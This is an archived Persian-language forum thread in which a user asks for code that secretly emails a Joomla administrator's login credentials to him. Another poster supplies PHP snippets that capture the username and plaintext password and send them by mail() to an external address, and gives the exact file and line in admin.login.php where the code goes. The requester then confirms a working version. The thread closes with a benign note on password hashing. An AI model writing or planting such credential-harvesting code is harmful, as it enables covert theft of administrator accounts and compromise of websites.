PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : درخواست کد برای جوملا _ آقای rn4j1m1 کمک !

Unkn0wn200
October 24th, 2010, 12:33
سلام

من یه کد لازم دارم که وقتی Administrator از قسمت http://site.com/administrator یوزر و پسوردش رو وارد کرد برای من ایمیل شه یا تو یه فایل ذخیره شه

لطفا این کد رو بزارید و بگید کجا باید قرار بدم

نیاز فوری دارم - مرسی

mdf092
October 24th, 2010, 13:18
این رو یه نگاه بنداز بد نیست
jLogonAlert - Joomla! Extensions Directory (http://extensions.joomla.org/extensions/access-a-security/site-security/site-monitoring/9491)

Unkn0wn200
October 24th, 2010, 13:37
می تونم بپرسم این چیه؟ چه ربطی به درخواست من داشت؟
من یه کد می خوام که پشت پیج ادمین بزارم تا وقتی ادمین لاگین کرد یوزر پسوردش برام میل شه

mdf092
October 24th, 2010, 13:44
می تونم بپرسم این چیه؟ چه ربطی به درخواست من داشت؟
من یه کد می خوام که پشت پیج ادمین بزارم تا وقتی ادمین لاگین کرد یوزر پسوردش برام میل شه

توضیحات رو مطالعه کردی؟

jLogonAlert advice you with custom email when someone try to access on your web site!
You can configure for each joomla! user a custom alert message and configure if user want alert for backend / frontend login.
ترجمه:
این کامپوننت با کمک ایمیل سفارشی هرگاه فردی اقدام به ورود به سایت کند به شما اطلاعا میدهد.
میتوانید برای هر کاربر تنظیم نمایید تا اگر در بخش مدیریت یا سایت اصلی وارد شد یه پیام ارسال کند

Unkn0wn200
October 24th, 2010, 13:51
بازم متوجه نشدم
اگه میشه دقیق بگین چی کار کنم

mdf092
October 24th, 2010, 14:13
بازم متوجه نشدم
اگه میشه دقیق بگین چی کار کنم

این کامپوننت جوملا هستش و دانلود کنبد و توی سایتتون نصب کنید

Unkn0wn200
October 24th, 2010, 14:17
چیزی شبیه این ندارید؟ http://www.webhostingtalk.ir/f148/15256/
کد هایی مثل تاپیکی که گفتم
مثلا آی پی میده حالا بیایم یوزر پس بگیریم

mdf092
October 24th, 2010, 14:58
$message = "IP:".$_SERVER['REMOTE_ADDR'] ."\n<br />username:".$_REQUEST['modlgn_username'] ."\n<br />password:".$_REQUEST['modlgn_passwd'];

$to="test@gmail.com";

$headers .= "From: Me <me@test.com>";

mail($to, "Admin login info", $message, $headers);

اما این کارها درست نیستا:-ss
این رو توی صفحه index.php بذار البیته یه چندتا if هم باید چاشنی کار کنی

Unkn0wn200
October 24th, 2010, 15:16
جواب نداد
فقط آی پی رو میده :((

---------- Post added at 02:16 PM ---------- Previous post was at 02:07 PM ----------

$message = "IP:".$_SERVER['REMOTE_ADDR'] ."\n username:".$_REQUEST['username'] ."\n password:".$_REQUEST['passwd'];

$to="U@gmail.com";

$headers .= "From: Me <Joomla !>";

این کد رو در فایل /administrator/components/com_login/admin.login.php بعد از خط زیر قرار بدین درست میشه :

$result = $mainframe->login($credentials);

if (!JError::isError($result)) {

مرسی از دوستان

mdf092
October 24th, 2010, 15:17
برو توی فایل /administrator/components/com_login/admin.login.php
توی تابع login بعد از

$credentials['username'] = JRequest::getVar('username', '', 'method', 'username');
$credentials['password'] = JRequest::getVar('passwd', '', 'post', 'string', JREQUEST_ALLOWRAW);

دستورات زیر را کپی کن

$message = "IP:".$_SERVER['REMOTE_ADDR'] ."\n<br />username:".$credentials['username'] ."\n<br />password:".$credentials['password'];

$to="test@gmail.com";

$headers .= "From: Me <me@test.com>";

mail($to, "Admin login info", $message, $headers);دیگه if هم نمیخواد به احتمال 100% جواب میده

Unkn0wn200
October 25th, 2010, 00:37
j, جوملا راهی هست که فرگت پسورد کنیم و دقیقا پسورد برامون ارسال بشه؟ نه اینکه تغییر داده بشه؟

mdf092
October 25th, 2010, 01:30
هر سیستمی که رمزت رو برات فرستاد به امنیتش شک کن
جوملا پسوردها رو Hash میکنه و به خاطر همین امکان بازیابی رمز قبلی نیست